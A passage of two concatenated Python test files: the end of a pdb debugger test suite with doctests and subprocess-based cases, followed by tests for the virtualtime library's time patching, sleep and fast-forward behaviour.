for "until" command if target breakpoing is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Failed to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Failed to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
test_virtualtime.py
|
#!/usr/bin/env python
import virtualtime
from virtualtime import datetime_tz
from virtualtime.datetime_tz import test_datetime_tz
import datetime
import time
import pytz
import pickle
import os
import subprocess
import sys
import decorator
import threading
import logging
from nose.plugins.attrib import attr
def outside(code_str, *import_modules):
"""Runs a code string in a separate process, pickles the result, and returns it"""
import_modules_str = 'import %s' % ', '.join(import_modules) if import_modules else ''
command_string = 'import sys, pickle; sys.path = pickle.loads(sys.stdin.read()); %s; sys.stdout.write(pickle.dumps(%s))' % (import_modules_str, code_str)
pickle_path = pickle.dumps(sys.path)
p = subprocess.Popen([sys.executable, "-c", command_string], stdin=subprocess.PIPE, stdout=subprocess.PIPE, env=os.environ)
results, errors = p.communicate(pickle_path)
if errors and errors.strip():
raise ValueError(errors)
return pickle.loads(results)
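# A minimal usage sketch (hypothetical call, assuming the named module is
# importable in the child interpreter): run time.time() in a fresh process
# and get the unpickled float back.
#
#     remote_now = outside("time.time()", "time")
#     assert isinstance(remote_now, float)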
@decorator.decorator
def restore_time_after(test_function, *args, **kwargs):
try:
return test_function(*args, **kwargs)
finally:
virtualtime.restore_time()
@restore_time_after
def check_real_time_function(time_function, code_str, *import_modules):
"""Generic test for a linear time function that can be run by a spawned python process too"""
first_time = time_function()
time.sleep(0.1)
outside_time = outside(code_str, *import_modules)
time.sleep(0.1)
second_time = time_function()
assert first_time < outside_time < second_time
@restore_time_after
def run_time_function_tst(time_function, set_function, diff, enabled=True):
"""Generic test for time_function and a set_function that can move the return of that time_function forwards or backwards by diff
Checks that the right thing happens whether virtualtime is enabled or disabled"""
first_time = time_function()
set_function(first_time + diff)
late_time = time_function()
set_function(first_time - diff)
early_time = time_function()
virtualtime.restore_time()
last_time = time_function()
if enabled:
assert early_time < first_time < last_time < late_time
else:
assert first_time <= late_time <= early_time <= last_time
@restore_time_after
def run_time_derived_function_tst(derived_function, time_function, set_function, diff, min_diff=None, enabled=True):
"""Generic test for time_function and a set_function that can move the return of that time_function forwards or backwards by diff
Checks that the right thing happens whether virtualtime is enabled or disabled"""
first_derived, first_time = derived_function(), time_function()
set_function(first_time + diff)
late_derived = derived_function()
set_function(first_time - diff)
early_derived = derived_function()
virtualtime.restore_time()
if min_diff:
time.sleep(min_diff)
last_derived = derived_function()
if enabled:
assert early_derived < first_derived < last_derived < late_derived
else:
assert first_derived <= late_derived <= early_derived <= last_derived
def order_preserving_timestr_reslice(s):
"""Changes the Python format for asctime/ctime 'Sat Jun 06 16:26:11 1998' to '1998-06-06 16:26:11' so that it always increases over time"""
month_table = "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
s = s.replace(" ", "0")
y, m, d, t = int(s[-4:]), month_table.index(s[4:7]) + 1, int(s[8:10]), s[11:19]
return "%04d-%02d-%02d %s" % (y, m, d, t)
class RunUnpatched(object):
"""Base class for tests that should all be run with virtualtime disabled"""
@classmethod
def setup_class(cls):
"""Ensure that virtualtime is disabled when running these tests"""
cls.virtual_time_enabled = virtualtime.enabled()
assert not virtualtime.enabled()
@classmethod
def teardown_class(cls):
"""Ensure that virtualtime is disabled after running these tests"""
del cls.virtual_time_enabled
assert not virtualtime.enabled()
class RunPatched(object):
"""Base class for tests that should all be run with virtualtime enabled"""
@classmethod
def setup_class(cls):
"""Ensure that virtualtime is disabled before, then enabled when running these tests"""
assert not virtualtime.enabled()
virtualtime.enable()
cls.virtual_time_enabled = virtualtime.enabled()
assert cls.virtual_time_enabled
@classmethod
def teardown_class(cls):
"""Ensure that virtualtime was enabled when running these tests, but disabled after"""
del cls.virtual_time_enabled
assert virtualtime.enabled()
virtualtime.disable()
assert not virtualtime.enabled()
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
self.setUp()
def setUp(self):
"""Restores normal time to ensure tests start cleanly"""
virtualtime.restore_time()
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
"""Restores normal time after the method has finished"""
virtualtime.restore_time()
class TestPartialPatching(object):
@classmethod
def setup_class(cls):
virtualtime.disable()
def test_correspondence(self):
"""Checks that patching time and datetime modules independently works"""
start_time, start_date = time.time(), datetime.datetime.now()
virtualtime.patch_time_module()
second_time, second_date = time.time(), datetime.datetime.now()
assert 0 <= second_time - start_time <= 0.05
assert datetime.timedelta(0) <= second_date - start_date <= datetime.timedelta(seconds=0.05)
virtualtime.set_offset(3600)
half_time, half_date = time.time(), datetime.datetime.now()
assert 3600 <= half_time - start_time <= 3600.1
# datetime is not patched yet
assert datetime.timedelta(seconds=0) <= half_date - start_date <= datetime.timedelta(seconds=0.1)
virtualtime.patch_datetime_module()
whole_time, whole_date = time.time(), datetime.datetime.now()
assert 3600 <= whole_time - start_time <= 3600.1
assert datetime.timedelta(seconds=3600) <= whole_date - start_date <= datetime.timedelta(seconds=3600.1)
virtualtime.unpatch_time_module()
other_half_time, other_half_date = time.time(), datetime.datetime.now()
assert 0 <= other_half_time - start_time <= 0.1
assert datetime.timedelta(seconds=3600) <= other_half_date - start_date <= datetime.timedelta(seconds=3600.1)
@classmethod
def teardown_class(cls):
virtualtime.disable()
class RealTimeBase(object):
"""Tests for real time functions"""
def test_time(self):
"""tests that real time is still happening in the time.time() function"""
check_real_time_function(time.time, "time.time()", "time")
def test_datetime_now(self):
"""tests that real time is still happening in the datetime module"""
check_real_time_function(datetime.datetime.now, "datetime.datetime.now()", "datetime")
def test_datetime_now_with_tz(self):
"""tests that real time is still happening in the datetime module"""
def f():
return datetime.datetime.now(pytz.timezone('Africa/Johannesburg'))
check_real_time_function(f, "datetime.datetime.now(pytz.timezone('Africa/Johannesburg'))", "datetime", "pytz")
def test_datetime_utcnow(self):
"""tests that real time is still happening in the datetime module"""
check_real_time_function(datetime.datetime.utcnow, "datetime.datetime.utcnow()", "datetime")
def test_datetime_tz_now(self):
"""tests that real time is still happening in the datetime_tz module"""
check_real_time_function(datetime_tz.datetime_tz.now, "virtualtime.datetime_tz.datetime_tz.now()", "virtualtime.datetime_tz")
def test_datetime_tz_utcnow(self):
"""tests that real time is still happening in the datetime_tz module"""
check_real_time_function(datetime_tz.datetime_tz.utcnow, "virtualtime.datetime_tz.datetime_tz.utcnow()", "virtualtime.datetime_tz")
class TestUnpatchedRealTime(RealTimeBase, RunUnpatched):
"""Tests for real time functions when virtualtime is disabled"""
class TestPatchedRealTime(RealTimeBase, RunPatched):
"""Tests for real time functions when virtualtime is enabled"""
class TestTimeNotification(RunPatched):
"""Tests the different notification events that happen when virtualtime is adjusted"""
def test_notify_on_change(self):
self.notify_event = threading.Event()
virtualtime.notify_on_change(self.notify_event)
start_time = virtualtime._original_time()
virtualtime.set_offset(1)
assert self.notify_event.wait(0.1)
self.notify_event.clear()
offset_time = virtualtime._original_time()
assert offset_time - start_time < 0.1
virtualtime.set_time(0)
assert self.notify_event.wait(0.1)
self.notify_event.clear()
set_time = virtualtime._original_time()
assert set_time - offset_time < 0.1
virtualtime.restore_time()
assert self.notify_event.wait(0.1)
self.notify_event.clear()
restore_time = virtualtime._original_time()
assert restore_time - set_time < 0.1
def callback_thread(self):
"""Repeatedly sets the target event whilst recording the offsets"""
while not self.callback_stop:
if self.notify_event.wait(5):
if self.callback_stop:
break
self.callback_logs.append((virtualtime._original_time(), virtualtime._time_offset, self.callback_event.is_set()))
self.notify_event.clear()
self.callback_event.set()
elif not self.callback_stop:
self.callback_missed.append((virtualtime._original_time(), virtualtime._time_offset))
def test_callback(self):
self.notify_event = threading.Event()
virtualtime.notify_on_change(self.notify_event)
self.callback_stop = False
self.callback_event = threading.Event()
self.callback_logs = []
self.callback_missed = []
ct = threading.Thread(target=self.callback_thread)
ct.start()
virtualtime.wait_for_callback_on_change(self.callback_event)
try:
start_time = virtualtime._original_time()
virtualtime.set_offset(1)
assert len(self.callback_logs) == 1 and not self.callback_missed
assert self.callback_logs[0][1:] == (1, False)
offset_time = virtualtime._original_time()
assert offset_time - start_time < 0.1
virtualtime.set_time(0)
assert len(self.callback_logs) == 2 and not self.callback_missed
assert self.callback_logs[1][1] < -start_time + 1 and self.callback_logs[1][2] is False
set_time = virtualtime._original_time()
assert set_time - offset_time < 0.1
virtualtime.restore_time()
assert len(self.callback_logs) == 3 and not self.callback_missed
assert self.callback_logs[1][1] < -start_time + 1 and self.callback_logs[1][2] is False
restore_time = virtualtime._original_time()
assert restore_time - set_time < 0.1
finally:
# deleting this should ensure it drops out of the weak set and doesn't hang things up later...
del self.callback_event
self.callback_stop = True
self.notify_event.set()
ct.join()
class VirtualTimeBase(object):
"""Tests for virtual time functions when virtualtime is enabled"""
def test_datetime_init(self):
"""tests the basic instantiation of datetime objects."""
datetime.datetime(2012, 7, 25) # Richardg's birthday...hooray
datetime.datetime(year=2012, month=7, day=25, hour=10, minute=27, second=3, microsecond=100, tzinfo=pytz.timezone('Africa/Johannesburg'))
# test args, kwargs
args = (2012,7,25)
kwargs = {'hour':10, 'minute':27, 'second':3}
kwargs_only = {'year':2012, 'month':7, 'day': 25, 'hour':10, 'minute':27, 'second':3, 'microsecond':100, 'tzinfo': pytz.timezone('Africa/Johannesburg')}
datetime.datetime(*args)
datetime.datetime(*args, **kwargs)
datetime.datetime(**kwargs_only)
def test_time(self):
"""tests that we can set time"""
run_time_function_tst(time.time, virtualtime.set_time, 100, enabled=self.virtual_time_enabled)
def test_localtime(self):
"""tests that we can set time and it affects localtime"""
run_time_derived_function_tst(time.localtime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_gmtime(self):
"""tests that we can set time and it affects gmtime"""
run_time_derived_function_tst(time.gmtime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_asctime(self):
"""tests that we can set time and it affects asctime"""
order_preserving_asctime = lambda: order_preserving_timestr_reslice(time.asctime())
run_time_derived_function_tst(order_preserving_asctime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_ctime(self):
"""tests that we can set time and it affects ctime"""
order_preserving_ctime = lambda: order_preserving_timestr_reslice(time.ctime())
run_time_derived_function_tst(order_preserving_ctime, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_strftime(self):
"""tests that we can set time and it affects ctime"""
strftime_iso = lambda: time.strftime("%Y-%m-%d %H:%M:%S")
run_time_derived_function_tst(strftime_iso, time.time, virtualtime.set_time, 100, min_diff=1, enabled=self.virtual_time_enabled)
def test_datetime_now(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime.datetime.now, virtualtime.set_local_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_utcnow(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime.datetime.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_now(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime_tz.datetime_tz.now, virtualtime.set_local_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_utcnow(self):
"""tests that setting time and datetime are both possible"""
run_time_function_tst(datetime_tz.datetime_tz.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
def test_datetime_tz_now_other_tz(self):
"""tests that setting time and datetime are both possible"""
for tz_name in ["Asia/Tokyo", "Europe/London", "America/Chicago"]:
tz = pytz.timezone(tz_name)
tz_now = lambda: datetime_tz.datetime_tz.now().astimezone(tz)
run_time_derived_function_tst(tz_now, datetime_tz.datetime_tz.utcnow, virtualtime.set_utc_datetime, datetime.timedelta(seconds=100), enabled=self.virtual_time_enabled)
class TestDisabledVirtualTime(VirtualTimeBase, RunUnpatched):
"""Tests that virtual time functions have no effect when VirtualTime is disabled"""
class TestVirtualTime(VirtualTimeBase, RunPatched):
"""Tests that virtual time functions have no effect when VirtualTime is disabled"""
class SleepBase(object):
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
self.setUp()
def setUp(self):
self.initial_waiter_count = len(virtualtime._virtual_time_state._Condition__waiters)
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
del self.initial_waiter_count
def wait_sleep_started(self, sleep_count, max_wait=5.0):
"""Waits for the given number of sleeps to start before continuing (with a timeout)"""
if not self.virtual_time_enabled:
return
start_wait_check = virtualtime._original_time()
while len(virtualtime._virtual_time_state._Condition__waiters) < self.initial_waiter_count + sleep_count:
virtualtime._original_sleep(0.001)
delay = virtualtime._original_time() - start_wait_check
if delay > max_wait:
raise ValueError("Not enough sleepers started waiting in time...")
@restore_time_after
def test_sleep(self):
"""Tests that sleep comes back quicker than normal when time is advanced"""
first_time = time.time()
sleeper_thread = threading.Thread(target=time.sleep, args=(3,), name="test_sleep_sleeper")
sleeper_thread.start()
self.wait_sleep_started(1, 0.2)
virtualtime.set_time(first_time + 5)
sleeper_thread.join()
virtualtime.restore_time()
join_time = time.time()
if self.virtual_time_enabled:
assert join_time - first_time < 0.5
else:
assert join_time - first_time >= 3
@restore_time_after
def test_parallel_sleeps(self):
"""Tests that sleep comes back quicker than normal when time is advanced, and that this works with lots of threads"""
first_time = virtualtime._original_time()
sleeper_threads = {}
REPEATS = 100
for n in range(REPEATS):
sleeper_threads[n] = sleeper_thread = threading.Thread(target=time.sleep, args=(3,), name="test_sleep_sleeper_%d" % n)
sleeper_thread.start()
self.wait_sleep_started(REPEATS, 0.5)
thread_time = virtualtime._original_time()
setup_duration = thread_time - first_time
assert setup_duration < 0.5
virtualtime.set_time(thread_time + 20)
for n in range(REPEATS):
sleeper_threads[n].join()
join_time = virtualtime._original_time()
sleep_duration = join_time - thread_time
virtualtime.restore_time()
if self.virtual_time_enabled:
assert sleep_duration < 0.2
else:
assert sleep_duration >= 3
class TestDisabledSleep(SleepBase, RunUnpatched):
pass
class TestSleep(SleepBase, RunPatched):
@attr('long_running')
def test_many_parallel_sleeps(self):
"""Tests that sleep comes back quicker than normal when time is advanced, and that this works with lots of threads when repeated many times"""
LOOPS = 100
for m in range(LOOPS):
self.test_parallel_sleeps()
class TestFastForward(RunPatched):
def fast_forward_catcher(self, event, msg_dict):
offsets = msg_dict['offsets']
while "stop" not in msg_dict:
event.wait()
offsets.append(virtualtime._time_offset)
event.clear()
@restore_time_after
def test_fast_forward_time(self):
"""Test that fast forwarding the time works properly"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(1)
assert virtualtime._time_offset == 1
virtualtime.fast_forward_time(2.5)
assert virtualtime._time_offset == 3.5
virtualtime.fast_forward_time(target=start_time + 9.1, step_size=2.0)
assert 9 <= virtualtime._time_offset <= 9.2
virtualtime.restore_time()
virtualtime.fast_forward_time(-1.3, step_size=0.9)
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets[:6] == [1.0, 2.0, 3.0, 3.5, 5.5, 7.5]
assert 9 <= offsets[6] <= 9.2
assert offsets[7:11] == [0, -0.9, -1.3, 0]
# depends on how long the stop event takes?
assert (not offsets[11:]) or offsets[11:] == [0]
@attr('long_running')
@restore_time_after
def test_fast_forward_time_long(self):
"""Test that fast forwarding the time a long way works properly"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(1000, step_size=1)
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets == list(range(1, 1001)) + [0]
@restore_time_after
def test_fast_forward_datetime_style(self):
"""Test that fast forwarding the time works properly when using datetime-style objects"""
event = threading.Event()
virtualtime.notify_on_change(event)
offsets = []
msg_dict = {'offsets': offsets}
catcher_thread = threading.Thread(target=self.fast_forward_catcher, args=(event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_datetime_now()
utc_start_time = datetime_tz.localize(start_time).astimezone(pytz.utc)
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=1))
assert virtualtime._time_offset == 1
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=2.5))
assert virtualtime._time_offset == 3.5
virtualtime.fast_forward_local_datetime(target=start_time + datetime.timedelta(seconds=9.1), step_size=datetime.timedelta(seconds=2.0))
assert 9 <= virtualtime._time_offset <= 9.2
virtualtime.fast_forward_utc_datetime(target=utc_start_time + datetime.timedelta(seconds=18.2), step_size=datetime.timedelta(seconds=20.0))
assert 18 <= virtualtime._time_offset <= 18.3
virtualtime.restore_time()
virtualtime.fast_forward_timedelta(datetime.timedelta(seconds=-1.3), step_size=datetime.timedelta(seconds=0.9))
virtualtime.restore_time()
msg_dict['stop'] = True
event.set()
catcher_thread.join()
assert offsets[:6] == [1.0, 2.0, 3.0, 3.5, 5.5, 7.5]
assert 9 <= offsets[6] <= 9.2
assert 18 <= offsets[7] <= 18.3
assert offsets[8:12] == [0, -0.9, -1.3, 0]
# depends on how long the stop event takes?
assert (not offsets[12:]) or offsets[12:] == [0]
def fast_forward_delayer(self, notify_event, delay_event, msg_dict):
